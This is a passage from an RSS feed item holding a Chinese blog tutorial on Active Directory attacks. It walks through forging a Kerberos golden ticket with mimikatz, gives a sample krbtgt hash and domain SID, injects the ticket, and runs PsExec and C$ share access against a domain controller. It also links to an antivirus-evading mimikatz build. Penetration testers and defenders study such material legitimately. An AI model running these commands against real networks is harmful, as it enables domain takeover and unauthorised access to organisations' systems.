class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;kerberos::golden /user:&amp;lt;要伪造的⽤户名&amp;gt; /domain:&amp;lt;完整域名&amp;gt; /krbtgt:&amp;lt;krbtgt ⽤户的 hash&amp;gt; /sid:&amp;lt;域sid&amp;gt; /ticket:&amp;lt;⽣成的⽂件名.kirbr&amp;gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;kerberos::golden /user:Administrator /domain:test.local /krbtgt:fc9433a1a38088e6b6b74e2c29cf02bd /sid:S-1-5-21-1304053684-1769385709-786886762-500 /ticket:carmi.kirbr&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0031.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="3注入票据"&gt;&lt;a href="#3%e6%b3%a8%e5%85%a5%e7%a5%a8%e6%8d%ae" class="header-anchor"&gt;&lt;/a&gt;3、注入票据&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;kerberos::ptt carmi.kirbr&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0032.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="4生成域控会话"&gt;&lt;a href="#4%e7%94%9f%e6%88%90%e5%9f%9f%e6%8e%a7%e4%bc%9a%e8%af%9d" class="header-anchor"&gt;&lt;/a&gt;4、生成域控会话&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;span class="lnt"&gt;5&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;misc::cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;whoami&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;dir \\192.168.126.10\c$&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PsExec.exe \\192.168.126.10 cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ipconfig&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0033.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0034.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;a class="link" href="https://blog.csdn.net/m0_55751267/article/details/127990619" target="_blank" rel="noopener"&#10; &gt;https://blog.csdn.net/m0_55751267/article/details/127990619&lt;/a&gt; 此处有白银和黄金票据的原理&lt;/p&gt;&#10;&lt;p&gt;此处的博客：&lt;a class="link" href="https://xz.aliyun.com/t/13435?time__1311=Gqmxu7G%3D5mq05DK5YK0%3DIouDfxiT277GbD" target="_blank" rel="noopener"&#10; &gt;https://xz.aliyun.com/t/13435?time__1311=Gqmxu7G%3D5mq05DK5YK0%3DIouDfxiT277GbD&lt;/a&gt;&lt;/p&gt;&#10;&lt;p&gt;免杀mimikatz &lt;a class="link" href="https://github.com/wangfly-me/mimikatz_bypass/releases/tag/v1.0" target="_blank" rel="noopener"&#10; &gt;https://github.com/wangfly-me/mimikatz_bypass/releases/tag/v1.0&lt;/a&gt;&lt;/p&gt;&#10;&lt;p&gt;参考如下:&lt;/p&gt;&#10;&lt;p&gt;&lt;a class="link" href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround" target="_blank" rel="noopener"&#10; &gt;https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround&lt;/a&gt;&lt;/p&gt;&#10;</description></item></channel></rss>